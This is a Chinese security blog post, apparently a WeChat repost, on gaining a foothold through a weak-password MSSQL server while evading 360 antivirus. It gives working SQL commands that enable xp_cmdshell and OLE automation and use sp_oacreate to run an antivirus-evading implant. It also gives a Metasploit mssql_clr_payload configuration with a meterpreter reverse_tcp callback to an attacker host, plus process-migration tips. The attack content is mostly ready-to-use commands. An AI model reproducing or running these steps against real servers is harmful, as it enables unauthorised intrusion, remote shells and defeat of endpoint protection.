服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

MSSQL弱口令绕过某数字上线

日期: 来源:潇湘信安收集编辑:3had0w
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


现在只对常读和星标的公众号才展示大图推送,建议大家能把潇湘信安“设为星标”,否则可能看不到了...!


0x01 前言

朋友实战中遇到的场景:MSSQL弱口令,sa权限,安装有360全家桶,问如何绕过360上线?

根据他的叙述说明这个数据库是可以直连的,猜测应该是扫到的一台MSSQL弱口令的机器。
这篇文章我将分享下他这种场景的一些绕过方式,只是给大家提供思路,算是抛砖引玉吧,大家自行发挥!

0x02 前期测试

内网扫到一台MSSQL弱口令,或者一个SQL注入,这时我们一般都会先判断是否为dba权限、xp_cmdshell组件是否可用?如果可用则直接执行命令提权。

判断当前是否为dba权限,为1则可以提权select is_srvrolemember('sysadmin');
查看是否存在xp_cmdshellexec sp_configure 'xp_cmdshell', 1;reconfigure;
查看能否使用xp_cmdshell,从mssql2005版本之后默认关闭select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'
开启xp_cmdshellexec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 1;reconfigure;
关闭xp_cmdshellexec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 0;reconfigure;
执行命令xp_cmdshellexec master..xp_cmdshell 'cmd /c whoami'


但如果目标主机有360时就一定会拦截,常见返回报错不是5就是拒绝访问。

因为这个组件调用的是system32下的cmd.exe,360已经拦死了,这里没法绕过!之前文章中也有说过。

sqlmap也一样,xp_cmdshell都是在sqlservr.exe进程下起一个cmd.exe子进程来执行命令和程序的,这也就是360拦截原因,检测了sqlservr.exe进程链。


注:MSSQL堆叠注入执行多条SQL语句时必须加上;分号,否则无法正常执行,而客户端连接MSSQL数据库执行多条SQL语句时只需换行即可,不能用;分号,否则也可能无法正常执行。


0x03 绕过方式

(1) Godzilla
利用哥斯拉“数据库Shell”功能连上这个数据库,然后将命令行模板中的cmd直接改为我们的免杀马。

这时只需要在命令行下随便输入个字符回车执行即可成功上线,360全程无拦截。


(2) sp_oacreate

开启Ole automation procedures,并使用sp_oacreate存储过程调用wscript.shell组件执行命令,只需要将免杀马做为程序去执行即可成功上线,360全程无拦截。
开启Ole automation proceduresexec sp_configure 'show advanced options', 1;reconfigureexec sp_configure 'ole automation procedures',1;reconfigure
执行命令sp_oacreatedeclare @o intexec sp_oacreate 'wscript.shell',@o outexec sp_oamethod @o,'run',null,'C:\ProgramData\360.exe'


(3) mssql_clr_payload

我们还可以利用MSF下的mssql_clr_payload模块来进行上线,该模块在执行时会自动开启CLR存储过程并将数据库标记为可信任等相关操作,360全程无拦截。
use exploit/windows/mssql/mssql_clr_payloadset rhosts 192.168.1.109set username saset password 123456set payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.120set lport 443

这里可以看到CLR这种利用方式也不是调用cmd.exe执行的,没有创建任何子进程,而是直接运行在sqlservr.exe进程下了,所以360不会对其拦截!!!


0x04 文末总结

Godzilla、sp_oacreate这两种方式都是将我们的免杀马做为程序执行,没有调用cmd.exe执行,所以360也不会拦截,但如果做为参数执行肯定还是会被拦的。


修改哥斯拉命令执行模板、EfsPotato插件将我们的免杀马做为程序执行上线MSF时建议加个进程迁移,否则执行后哥斯拉可能会卡住,执行不了任何操作。

set AutoRunScript migrate -fset AutoRunScript post/windows/manage/migrate NAME=notepad.exe

注意:看到有师傅说这种方法也会被拦,不知道他是不是开了核晶模式?但我这里没有拦,不知道什么情况,大家在实战中自己多去测试下吧......!



关 注 有 礼



关注公众号回复“9527”可以领取一套HTB靶场文档和视频,“1208”个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“2191”潇湘信安文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。
 还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读





相关阅读

  • HW红队攻防、渗透痕迹隐藏的神器(附下载)

  • 通过在系统日志和文件系统时间戳上留下零痕迹,在 Linux 漏洞利用/渗透测试期间覆盖您的踪迹。moonwalk是一个 400 KB 的单二进制可执行文件,可以在渗透测试Unix机器时清除您的
  • 100个黑客小知识!

  • 文章来源:深信服科技网络安全风险无处不在,为大家梳理了100个网络安全相关的小知识,希望能进一步提升大家的安全意识,帮助大家建立更加安全的网络环境。“如侵权请私聊公众号删
  • NEW · 简随 | 极简+1。# 多彩的、双色的。

  • 简随 · 前言第二个预览出来咯依然是极简上线之日我再通知你们昨天的「自在」周末上线给你们安卓苹果同步上线 界面设计加载中 ↓这套稿子部分人在小红书见过因为我做了
  • 不到 20 人的 IT 公司,值得去吗

  • 大家伙,我是徐公,6 年大厂程序员经验。今天在知乎看到一个挺有意思的话题:不到 20 人的 IT 公司该去吗?回答区有一位老哥分享了自己在一个20 来人的小公司的奇葩工作经历,分享一
  • 会用 kali 破解 wifi 吗?

  • 来自公众号:入门小站注:只是为了方便交流学习,请勿其他用途;谢谢观看!“准备好 [kali] 系统,电脑可以链接无线 wifi!! 使用 Aircrack-ng 进行暴力破解,linux 上已经安装此工具!1. 执
  • 原创Paper | Citrix CVE-2022-27518 漏洞分析

  • 作者:hanwang@知道创宇404实验室日期:2023年2月17日漏洞介绍参考资料Citrix在2022年12月份发布了CVSS评分9.8的CVE-2022-27518远程代码执行漏洞通告,距今已经过去两个多月了,由
  • 终于,京东出手了

  • 后台回复 品牌 免费送你《135本品牌营销必读书》作者 | 张逸 来源 | TOP电商 对标拼多多,京东这次是要认真起来了。就在最近,有消息透露京东计划在3月初上线百亿补贴活动,
  • 每日安全动态推送(2-17)

  • Tencent Security Xuanwu Lab Daily News• Linux内核常用保护和绕过技术:http://blog.topsec.com.cn/linux%e5%86%85%e6%a0%b8%e5%b8%b8%e7%94%a8%e4%bf%9d%e6%8a%a4%e5%92
  • COM 进程注入技术-编程技术

  • 本文为看雪论坛优秀文章看雪论坛作者ID:techliu项目地址:https://github.com/0xlane/com-process-injectProcess Injection via Component Object Model (COM) IRundown::DoCa

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • MSSQL弱口令绕过某数字上线

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • 收藏!Web安全漏洞靶场库集合

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • Spring环境下有关内存马的回显总结

  • 0x01 前言在学习各种内存马的过程中,关注到了观星实验室的一篇文章,较为全面的列举了在Spring环境下的有关内存马的实现技巧这里我们深入进行学习学习一下0x02 正文前景回顾网
  • 初探 | 冰蝎流量免杀

  • 0x01 前言冰蝎4.0发布以后,可以自定义传输协议了,也就是我们能对流量进行改造,本文依据rebeyond大佬文章对冰蝎流量进行改造,记录一下踩过的坑。https://mp.weixin.qq.com/s/EwY
  • 干货 | 冰蝎各版本工具分析与魔改思路

  • 0x00 V2版本1. 项目github项目:https://github.com/rebeyond/Behinder/releases/V2 源码:https://github.com/hktalent/afterLoader2. 流量分析执行流程图:首次连接一句话服务